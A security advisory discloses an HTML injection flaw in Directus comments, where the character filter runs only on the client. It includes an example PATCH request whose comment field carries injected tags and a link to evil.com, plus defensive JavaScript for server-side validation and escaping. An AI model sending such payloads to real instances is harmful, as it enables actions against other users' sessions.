GHSA-r6wx-627v-gh2f: Directus has an HTML Injection in Comment

Summary

The Comment feature implements a filter that prevents users from entering restricted characters such as HTML tags. However, this filter runs only on the client side, so it can be bypassed, leaving the application vulnerable to HTML injection.

Details

The Comment feature's character filter runs only on the client side; it can be bypassed by sending a request directly to the endpoint.

Example Request:

PATCH /activity/comment/3 HTTP/2
Host: directus.local

{
  "comment": "<h1>TEST <p style=\"color:red\">HTML INJECTION</p> <a href=\"//evil.com\">Test Link</a></h1>"
}

Example Response:

{
  "data": {
    "id": 3,
    "action": "comment",
    "user": "288fdccc-399a-40a1-ac63-811bf62e6a18",
    "timestamp": "2023-09-06T02:23:40.740Z",
    "ip": "10.42.0.1",
    "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36",
    "collection": "directus_files",
    "item": "7247dda1-c386-4e7a-8121-7e9c1a42c15a",
    "comment": "<h1>TEST <p style=\"color:red\">HTML INJECTION</p> <a href=\"//evil.com\">Test Link</a></h1>",
    "origin": "https://directus.local",
    "revisions": []
  }
}

Example Result:

[Screenshot 2023-09-06 094536: rendered result, not reproduced]

Impact

With the introduction of session cookies, this issue has become exploitable: a malicious script can now perform authenticated actions on the current user's behalf.
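The fix the advisory implies is to enforce the same filter on the server, where a direct PATCH cannot skip it. The following is an added example written for this page, not Directus code or the project's patch; it assumes the restricted set is the tag delimiters `<` and `>` (the page does not list the client filter's exact set), and the row fields `action` and `comment` are assumed from the response shown above.

```javascript
// Added example, not part of Directus or of the advisory: the comment filter
// enforced on the server, where a direct PATCH cannot skip it.

// Assumption: the restricted characters are the ones that open and close
// HTML tags. The page does not list the client-side filter's exact set.
const RESTRICTED_CHARS = /[<>]/;

// Validate a comment body as the endpoint should, before anything is stored.
function validateComment(comment) {
  if (typeof comment !== 'string' || comment.trim() === '') {
    return { ok: false, reason: 'comment must be a non-empty string' };
  }
  const hit = comment.match(RESTRICTED_CHARS);
  if (hit) {
    return { ok: false, reason: `restricted character ${JSON.stringify(hit[0])} at offset ${hit.index}` };
  }
  return { ok: true, comment };
}

// Defence in depth on the rendering side: escape the five characters that can
// change HTML context, so an already-stored payload is shown as text, not markup.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// After patching, find activity rows whose stored comment still carries markup
// so they can be reviewed or cleaned. A tag name must follow '<' directly, so a
// plain comparison like "a < b" is not flagged. Only these two fields are assumed.
const TAG_PATTERN = /<\/?[a-zA-Z][^>]*>/;
function findTaggedComments(rows) {
  return rows.filter((row) => row.action === 'comment' && TAG_PATTERN.test(String(row.comment ?? '')));
}

// Constructed sample data: the advisory's request body plus three benign rows.
const INJECTED = '<h1>TEST <p style="color:red">HTML INJECTION</p> <a href="//evil.com">Test Link</a></h1>';
const SAMPLE_ROWS = [
  { id: 1, action: 'comment', comment: 'Looks good, approved.' },
  { id: 2, action: 'update', comment: null },
  { id: 3, action: 'comment', comment: INJECTED },
  { id: 4, action: 'comment', comment: 'a < b and b > c' },
];

console.log(validateComment(INJECTED));                         // rejected at the first '<'
console.log(escapeHtml(INJECTED));                              // rendered as inert text
console.log(findTaggedComments(SAMPLE_ROWS).map((r) => r.id));  // [ 3 ]
```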


References

  • GHSA-r6wx-627v-gh2f
  • https://nvd.nist.gov/vuln/detail/CVE-2024-54128
  • directus/directus@4487fb1
  • directus/directus@c89dbb2
